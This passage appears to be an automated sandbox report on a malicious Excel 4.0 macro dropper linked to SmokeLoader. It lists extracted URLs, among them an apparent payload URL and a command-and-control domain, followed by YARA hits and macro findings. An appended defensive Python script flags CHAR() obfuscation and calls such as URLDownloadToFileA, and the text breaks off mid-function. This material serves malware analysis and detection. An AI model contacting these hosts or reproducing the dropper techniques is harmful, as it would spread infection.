28 13 bf 29 ee fc 3b f9 b2 41 32 f6 2f b9 03 e4 03 49 76 77 d1 e5 3c 07 16 dc b3 24 d8 4e 82 53 3f 63 b8 76 86 a7 7b 46 45 d2 1a 99 7f b4 69 dd d9 80 d2 b8 ec c6 a1 28 30 e3 ba cd 2e 90 89 f8 87 e1 67 30 ca ae fd 29 d9 e3 4e 45 11 61 c1 79 35 1a 71 12 2c 89 7a e5 ee ba de b4 52 2d e5 4d a8 2a 09 ed 8d e0 c5 c5 05 c8 a8 b5 5a fa 5e 25 dc 4d 23 4c 25 cb 68 52 92 ce bf ea 47 2d 58 6a 32 83 f9 19 c6 5d 55 b3 ba 9f 27 a1 55 99 36 22 5d 7c 2f 6d ae c0 5d a3 79 e4 98 4f a8 60 df 25 33 61 8e ba 97 e0 01 49 74 ed eb b6 4a a8 af db 89 ea 3c e8 20 75 33 2a cd fa 45 43 6f 95 bf c3 3d f2 78 17 ed 2c b2 0e 05 04 a3 4f 29 2d c3 d3 9b 88 a6 56 95 1a f3 a3 ec 14 a4 b7 79 4b 95 0a 7e 47 01 a6 2f f3
Source: Document 8402.xlsb | String found in binary or memory: http://alamalidaa.com/15.gif
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: explorer.exe, 0000000B.00000003.371345378.0000000008043000.00000004.00000001.sdmp, explorer.exe, 0000001A.00000002.392831410.00000000006C8000.00000004.00000020.sdmp | String found in binary or memory: http://sm15sdsd.xyz/
Source: explorer.exe, 0000001A.00000002.392831410.00000000006C8000.00000004.00000020.sdmp | String found in binary or memory: http://sm15sdsd.xyz/Mozilla/5.0
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000B.00000000.305309084.0000000006840000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: B7AE.exe, 00000018.00000003.411696862.0000000002411000.00000004.00000001.sdmp | String found in binary or memory: http://www.ip-adress.com
Source: B7AE.exe, 00000018.00000003.411696862.0000000002411000.00000004.00000001.sdmp | String found in binary or memory: http://www.ip-adress.com?
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://api.aadrm.com/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://api.diagnostics.office.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
Source: A185.exe, dmxhr.exe, 00000017.00000003.378395734.00000000011A0000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org/
Source: A185.exe, 00000012.00000002.376547768.0000000000400000.00000040.00020000.sdmp, dmxhr.exe, 00000017.00000003.378395734.00000000011A0000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org/https://ip4.seeip.org/runasMicrosoft
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://api.microsoftstream.com/api/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://api.office.net
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://api.onedrive.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://apis.live.net/v5.0/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://augloop.office.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://augloop.office.com/v2
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://cdn.entity.
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://clients.config.office.net/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://config.edge.skype.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://cortana.ai
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://cr.office.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://dataservice.o365filtering.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://devnull.onenote.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://directory.services.
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://graph.ppe.windows.net
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://graph.ppe.windows.net/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://graph.windows.net
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://graph.windows.net/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://incidents.diagnostics.office.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: A185.exe, dmxhr.exe, 00000017.00000003.378395734.00000000011A0000.00000004.00000001.sdmp | String found in binary or memory: https://ip4.seeip.org/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://lifecycle.office.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://login.microsoftonline.com/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://login.microsoftonline.com/common
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://login.windows.local
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://management.azure.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://management.azure.com/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://messaging.office.com/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://ncus-000.contentsync.
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://officeapps.live.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://onedrive.live.com
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.dr | String found in binary or memory: https://onedrive.live.com/embed?
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://powerlift-user.acompli.net
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://powerlift.acompli.net
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://settings.outlook.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://shell.suite.office.com:1443
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://store.office.com/addinstemplate
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://store.office.de/addinstemplate
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://tasks.office.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://templatelogging.office.com/client/log
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://wus2-000.contentsync.
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://www.odwebp.svc.ms

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match | File source: 00000013.00000002.395141332.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.382516594.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.323021071.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.277473302.0000000000A40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.Msysprotect.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.3.bijvfaa.a30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Msysprotect.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.bijvfaa.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.bijvfaa.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.Msysprotect.exe.a40000.0.raw.unpack, type: UNPACKEDPE
Source: A185.exe, 00000012.00000002.376906323.0000000000C7A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\AppData\Local\Temp\A185.exe | Code function: 18_2_00403E80 CryptImportKey,CryptExportKey,CryptDestroyKey,18_2_00403E80

                      System Summary:

Found malicious Excel 4.0 Macro
Source: Document 8402.xlsb | Initial sample: URLDownloadToFileA
Found Excel 4.0 Macro with suspicious formulas
Source: Document 8402.xlsb | Initial sample: CALL
Source: Document 8402.xlsb | Initial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheet
Source: Document 8402.xlsb | Initial sample: Sheet size: 502841
Found obfuscated Excel 4.0 Macro
Source: Document 8402.xlsb | Initial sample: High usage of CHAR() function: 129
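The four Excel 4.0 findings above (URLDownloadToFileA, CALL, a large hidden macro sheet, heavy CHAR() usage) are the classic XLM dropper pattern: the API and library names are spelled out one CHAR() at a time so they never appear as plain strings, then CALL/REGISTER invokes them. The script below is an added example, not part of this report and not the sandbox's own detection logic. It works on formula text that a separate extractor (for example oletools' olevba or XLMMacroDeobfuscator) has already pulled out of the workbook, resolves the CHAR() concatenation, and then applies the same kinds of heuristics the report lists. The SAMPLE_FORMULAS and the thresholds are constructed assumptions, not the contents of Document 8402.xlsb or the sandbox's internal cut-offs.

```python
"""Static triage heuristics for Excel 4.0 (XLM) macro formulas.

Added example, not part of the sandbox report. Input is formula text already
extracted from a workbook; SAMPLE_FORMULAS are constructed for illustration
and thresholds are tunable assumptions.
"""
import re

# XLM functions that execute code or reach outside the workbook.
SUSPICIOUS_FUNCTIONS = {"CALL", "EXEC", "REGISTER", "RUN", "FOPEN", "FWRITE"}
# Win32 exports commonly reached from XLM via CALL/REGISTER.
SUSPICIOUS_IMPORTS = {"URLDownloadToFileA", "ShellExecuteA", "WinExec",
                      "VirtualAlloc", "CreateThread"}

CHAR_CALL = re.compile(r"CHAR\((\d{1,3})\)", re.IGNORECASE)
FUNC_NAME = re.compile(r"\b([A-Z][A-Z0-9.]*)\(")


def decode_char_concat(formula: str) -> str:
    """Replace CHAR(n) with the quoted character and collapse "a"&"b" into
    "ab", so a string assembled one character at a time becomes readable.
    Anything that is not CHAR() or a quoted literal is left untouched."""
    def to_literal(m):
        n = int(m.group(1))
        if not 1 <= n <= 255:          # CHAR() is only defined for 1..255
            return m.group(0)
        ch = chr(n)
        return '"' + ('""' if ch == '"' else ch) + '"'   # Excel doubles quotes
    s = CHAR_CALL.sub(to_literal, formula)
    return re.sub(r'"\s*&\s*"', "", s)


def triage_formulas(formulas, hidden_sheet_bytes=0,
                    char_threshold=20, sheet_threshold=100_000):
    """Return a sorted list of findings for a set of XLM formulas: CHAR()
    obfuscation, suspicious functions, dangerous imports, and an abnormally
    large hidden macro sheet (size supplied by the caller)."""
    findings = set()
    char_calls = sum(len(CHAR_CALL.findall(f)) for f in formulas)
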